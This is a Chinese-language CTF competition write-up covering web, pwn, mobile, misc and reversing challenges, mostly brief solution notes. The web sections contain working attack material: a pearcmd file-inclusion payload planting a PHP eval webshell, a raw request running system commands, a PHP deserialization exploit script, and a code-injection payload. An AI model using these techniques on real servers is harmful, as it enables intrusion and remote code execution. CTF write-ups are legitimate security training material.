date: 2024-7-25

author/team: 赛博保安

驴友小镇

image-20240725161345705

image-20240725161424862

龙溪秘境

bp爆破得到账号密码:
test:654321(ps:密码base64编码)
image-20240725161630181

武功论剑

开题源码:

1
2
3
4
5
6
7
8
9
10
<?php 
show_source(__FILE__);
if(isset($_GET['file'])){
    if(preg_match("/flag/i",$_GET['file'])){
        echo "no way";
    }
    else{
        $file=$_GET['file'];
        include_once($file);
    }

pearcmd文件包含

手写一个🐎子进去?file=/usr/local/lib/php/pearcmd.php&+config-create+/<?=eval($_POST[c]);?>+/tmp/shell.php

然后访问:

1
2
3
4
5
6
7
8
9
10
11
POST /source.php?file=/tmp/shell.php HTTP/1.1
Host: 59.62.61.30:45255
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

c=system("tac /flag");

image-20240725162102201

石能为鼓

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
show_source(__FILE__);

class ping {
    protected $xiang;

    function __construct() {
        $this->xiang = new fun();
    }

    function __destruct() {
        $this->xiang->cp();
    }
}

class fun {
    function cp() {
        echo "hello";
    }
}

class cup {
    private $data;
    function cp() {
        eval($this->data);
    }
}

unserialize($_GET['d']);

简简单单反序列化
EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
class ping {
    protected $xiang;
    function __construct($xiang) {
        $this->xiang = $xiang;
    }
}

class cup {
    private $data;
    function __construct($data) {
        $this->data = $data;
    }
}

$cup = new cup("system('cat /fl*');");
$ping = new ping($cup);
echo urlencode(serialize($ping));

//O%3A4%3A%22ping%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00xiang%22%3BO%3A3%3A%22cup%22%3A1%3A%7Bs%3A9%3A%22%00cup%00data%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D

萍水相逢

貌似是原题:
搜到题解,拿来主义咯!!

https://fanygit.github.io/2021/08/22/[web]%E4%B8%80%E9%81%93TimelineSec%E5%9B%A2%E9%98%9F%E5%85%A5%E9%98%9F%E9%A2%98/

EXP:**?code=‘input’(‘cmd’)(‘input’(‘value’));&cmd=system&value=/readflag ** ——> 拿走!一步到位

九龙吐水

PWN 题真的水吧可能,有且只有一题,队里web手写的

img

img

葛仙炼丹

Mobile

image-20240725163741783

image-20240725163759224

Apk文件,用jeb打开,搜关键字符串flag,看到checkflag函数,关注到下面有个xor,和两堆字符串,将他们异或输出为字符就得到flag了

image-20240725163809147

image-20240725163817127

星空栈道

MISC

首先打开,发现文件叫base.txt,然后立刻想到了base转图片,转了之后,发现图片损坏打不开,然后用010打开,发现其为elf文件,把后缀改成elf,用ida64打开

image-20240725164026673

发现循环异或就欧克了

九龙吐水

image-20240725164048961

先得10分找到,计分的地址,将分数修改为10000000

image-20240725164101191

花炮故里

打开txt,根据提示python可知,文件为python字节码,大致意思就是,输入flag,存到flaglist里面,然后对比flaglist的长度和已知数组ress的长度,不一样就退出,然后判断flaglist里的数加3,然后异或152是不是等于ress,如果等于就输出success,解密只要将ress里的数异或152,再减3即可

image-20240725164139491

image-20240725164157302

龙鳞石阶

打开流量包,找到dns部分,看到一些base+…的字符串,猜测为base64解密,试了一下,用最后几个可以解出flag

image-20240725164216963

金顶绝境

首先查壳,发现64无壳

发现一堆字符串和base64码表

image-20240725164248724

猜测为base64加密

转为字符串发现为Zmxh开头,更加肯定了猜想

image-20240725164302689

Base64解码得到flag

铁蹄关隘

道具题

image-20240725170452378

img